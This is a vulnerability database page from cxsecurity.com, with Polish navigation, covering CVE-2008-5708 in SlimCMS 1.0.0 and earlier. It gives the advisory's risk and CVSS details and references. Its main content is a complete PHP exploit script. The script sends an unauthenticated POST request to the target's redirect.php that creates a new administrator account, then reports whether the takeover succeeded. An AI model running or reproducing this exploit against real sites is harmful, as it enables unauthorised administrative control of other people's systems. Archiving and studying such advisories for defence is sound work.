Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit
2008.12.25
Credit:
athos
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-5708
CWE:
CWE-287
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
#!/usr/bin/php -q <?php /* SlimCMS <= 1.0.0 Privilege Escalation Exploit Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it Discovered On 11/10/2008 http://downloads.sourceforge.net/slimcms/SlimCMS-1.0.0.tgz?modtime=1217343227&big_mirror=0 */ error_reporting(0); $host = $argv[1]; $host = str_replace('http://',NULL,$host); $path = $argv[2]."/redirect.php"; $user = $argv[3]; if(!preg_match('/http:\/\/(.+?)$/',$host) and strlen($user) < 5) { echo "[?] Usage: php $argv[0][host][path][username]\r\n"; echo "[?] Usage: php $argv[0] http://localhost /cms milw0rm\r\n"; exit; } if(!$sock = fsockopen($host,80)) { die("Socket Error\r\n"); } $post .= "newusername=$user&newpassword=$user&newisadmin=1"; $data .= "POST /$path HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($post)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= "$post\r\n\r\n"; fputs($sock,$data); while(!feof($sock)) { $content .= fgets($sock); } fclose($sock); if(eregi('change.php',$content)) { echo "[?] Added New Administrator!\r\n"; echo "[?] Username and Password: $user\r\n"; exit; } else { echo "[?] Exploit Failed!\n"; } ?>
Referencje:
http://xforce.iss.net/xforce/xfdb/45824
http://www.securityfocus.com/bid/31736
http://www.milw0rm.com/exploits/6729
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top